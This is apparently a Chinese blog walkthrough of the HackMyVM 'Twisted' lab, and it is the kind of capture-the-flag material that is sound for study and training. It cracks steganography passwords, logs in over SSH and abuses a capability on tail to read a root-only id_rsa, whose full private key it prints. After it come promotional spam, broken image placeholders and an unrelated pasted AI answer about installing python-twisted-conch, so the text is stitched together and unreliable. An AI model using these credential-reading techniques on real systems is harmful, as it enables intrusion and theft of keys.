HackMyVM-Twisted




---


#### WEB信息收集


##### 主页信息收集


![](https://img-blog.csdnimg.cn/direct/06231b9b57024ac2936c60de36578e00.png)



我爱小猫们!
但是我更爱这个,因为它看起来不一样!



说明什么,这个图片很有可能存在可疑信息!

我们把图一和图二都下载到本地!




---


##### 图片隐写



我用了 binwalk、exiftool、steghide等都没有发现!

使用stegseek进行爆破吧!



┌──(root㉿ru)-[~/桌面]
└─# stegseek cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: “westlife”
[i] Original filename: “markus.txt”.
[i] Extracting to “cat-original.jpg.out”.

┌──(root㉿ru)-[~/桌面]
└─# cat cat-original.jpg.out
markuslovesbonita

这个是第一张图片隐藏文件内容!



┌──(root㉿ru)-[~/桌面]
└─# stegseek cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: “sexymama”
[i] Original filename: “mateo.txt”.
[i] Extracting to “cat-hidden.jpg.out”.

┌──(root㉿ru)-[~/桌面]
└─# cat cat-hidden.jpg.out
thisismypassword

这是第二张图片隐藏文件的内容!




---



markus:markuslovesbonita
mateo:thisismypassword




---


##### ssh连接



┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh mateo@192.168.9.146 -p 2222
The authenticity of host ‘[192.168.9.146]:2222 ([192.168.9.146]:2222)’ can’t be established.
ED25519 key fingerprint is SHA256:+Vy+50OqnmO0eOU2nhxE0uNjMjXrtpHTmrYtml4yF3s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.9.146]:2222’ (ED25519) to the list of known hosts.
mateo@192.168.9.146’s password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$



┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh markus@192.168.9.146 -p 2222
markus@192.168.9.146’s password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$



两个都能ssh登录!




---


#### 提权


##### 系统信息收集



mateo@twisted:~$ cat /etc/passwd | grep “home” | grep -v nologin
mateo❌1000:1000:mateo,:/home/mateo:/bin/bash
markus❌1001:1001:,:/home/markus:/bin/bash
bonita❌1002:1002:,:/home/bonita:/bin/bash



markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.



这两个用户都没有sudo权限,而且也没有flag!看来需要横向到 bonita用户!



markus@twisted:/var/cache/apt$ ls -al
total 62180
drwxr-xr-x 3 root root 4096 Oct 14 2020 .
drwxr-xr-x 8 root root 4096 Oct 13 2020 …
drwxr-xr-x 3 root root 12288 Oct 14 2020 archives
-rw------- 1 root root 1823 Oct 14 2020 id_rsa
-rw-r–r-- 1 root root 31831069 Oct 14 2020 pkgcache.bin
-rw-r–r-- 1 root root 31810419 Oct 14 2020 srcpkgcache.bin



查看不了!只能root用户查看!



mateo@twisted:/home/bonita$ ls
beroot user.txt
mateo@twisted:/home/bonita$ cat user.txt
cat: user.txt: Permission denied



/var/www/html/gogogo.wav
是一段音频,我使用工具audacity 进行查看音频,发现是摩斯密码!!我们再解码一下!


![](https://img-blog.csdnimg.cn/direct/cee99b498d7d4056862d42c1104b45ca.png)



G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .




---


![](https://img-blog.csdnimg.cn/direct/1dcbbab4a3f24c35999d794d40ad6eff.png)



linpeas脚本检查系统信息!


![](https://img-blog.csdnimg.cn/direct/f430cc99508b49b5a048c4e6c81b4d07.png)



Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。

这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。

如果Capabilities设置不正确,就会让攻击者有机可乘,实现权限提升。



正常情况下只有ping命令具有该权限!

所以我们可以使用tail命令突破限制!




---


##### tail突破限制


![](https://img-blog.csdnimg.cn/direct/658915519aa346209958009ceb0f89dc.png)



果然,我们可以轻松获得root和user!

但是我们还是得走个流程!




---


##### 横向移动



mateo@twisted:/tmp$ tail -n 40 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----


![](https://img-blog.csdnimg.cn/direct/666eff16ade24472bee4618ebf78fe49.png)



bonita@twisted:~$ ./beroot
Enter the code:
root

WRONG

把这个文件下载到本地,进行分析!


![](https://img-blog.csdnimg.cn/direct/e10339a2f0694d32a901a65e22c78127.png)



按住F12进行反编译,我们得到main方法的伪代码! 0x16f8则是我们需要找的!


![](https://img-blog.csdnimg.cn/direct/ba7d95e11c50490c9cde60b286fbbf32.png)



最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

afiaGf-1715848306571)]

[外链图片转存中…(img-ZcgkdrLp-1715848306571)]

[外链图片转存中…(img-tbjEMPC0-1715848306571)]

[外链图片转存中…(img-U0Su92b9-1715848306571)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

<think>好的,我现在需要帮助用户安装python-twisted-conch软件包。首先,我要回想一下用户提供的引用内容,看看是否有相关的安装方法。引用[2]提到了使用python setup.py install来安装pycrypto,而引用[3]则展示了用pip安装多个包,比如twisted、lxml等。所以可能用户已经知道一些基本的安装方法,但需要针对这个特定的包。 接下来,我得确认python-twisted-conch是什么。通常,以python-开头的包在Linux系统中可能是通过系统包管理器安装的,比如apt或yum。但用户之前用pip安装过其他Python包,所以可能需要用pip来安装。不过也有可能这个包在不同的仓库里。 首先,检查系统包管理器。用户之前提到过在Linux下升级Python,所以可能使用的是基于Debian的系统,比如Ubuntu。这时候可以建议用apt来安装。命令应该是sudo apt install python-twisted-conch。不过可能包的名字稍有不同,需要确认是否存在。 另外,引用[3]里安装了twisted,而python-twisted-conch可能属于Twisted项目的一部分。Twisted是一个事件驱动的网络引擎,可能conch是其中的一个模块。所以另一种可能性是通过pip安装Twisted,然后conch模块已经包含在内了。这时候可以建议用户pip install twisted,然后检查是否已经包含了conch。 但用户明确提到了python-twisted-conch,可能需要单独安装。这时候需要查证该包的正确安装方式。比如在PyPI上搜索是否有这个包,或者是否属于某个其他仓库。如果系统包管理器中有,推荐优先使用系统安装,因为可能有依赖管理更完善。 另外,用户之前安装scrapy时已经安装了twisted,可能版本不够或者需要额外组件。这时候可能需要指定版本或者额外的选项。如果系统包管理器没有,可能需要从源码安装,但这样比较麻烦。或者是否存在PyPI上的对应包,比如使用pip install twisted[conch]来安装带有conch支持的版本。 现在需要验证这些可能性。比如,检查Ubuntu的软件包列表,是否存在python-twisted-conch。快速搜索的话,发现确实存在这样的包,可以通过apt安装。因此,建议用户使用apt命令。 不过用户可能没有sudo权限,或者希望用pip安装。这时候需要确认PyPI是否有对应的包。查PyPI的话,twisted的conch模块是作为Twisted的一部分发布的,所以安装Twisted后应该可以使用。但可能需要安装额外的依赖,比如cryptography等。 综合来看,给出两种方法:系统包管理器安装和pip安装。同时提醒依赖问题,比如需要安装相关的开发库,如libssl-dev,这可能是在安装过程中需要的。 另外,引用[3]提到安装scrapy时会安装lxml、pyOpenSSL等,所以可能用户的环境中已经有一些依赖,但可能需要补充其他依赖。例如,安装python-twisted-conch可能需要OpenSSL的开发文件,所以在使用pip安装前需要先安装这些系统库。 总结步骤:首先尝试系统包管理器安装,如果不行,再用pip安装Twisted,并确保系统依赖已满足。同时提供验证安装是否成功的方法,比如导入模块。</think>根据您的需求,以下是安装$python\text{-}twisted\text{-}conch$软件包的详细步骤: ### 方法1: 通过系统包管理器安装(推荐) ```bash # Debian/Ubuntu系统 sudo apt update sudo apt install python-twisted-conch ``` 该命令会通过APT自动处理依赖关系并完成安装[^2][^3]。 ### 方法2: 通过pip安装 若系统仓库未提供该包,可使用: ```bash # 安装Twisted框架完整套件 pip install twisted[crypto,conch] ``` 这会安装包含SSH协议的conch模块及加密相关依赖[^3]。 ### 补充说明 1. 若出现编译错误,需先安装开发依赖: ```bash sudo apt install build-essential libssl-dev python-dev ``` 2. 验证安装: ```python python -c "from twisted.conch import ssh" # 无报错则成功 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值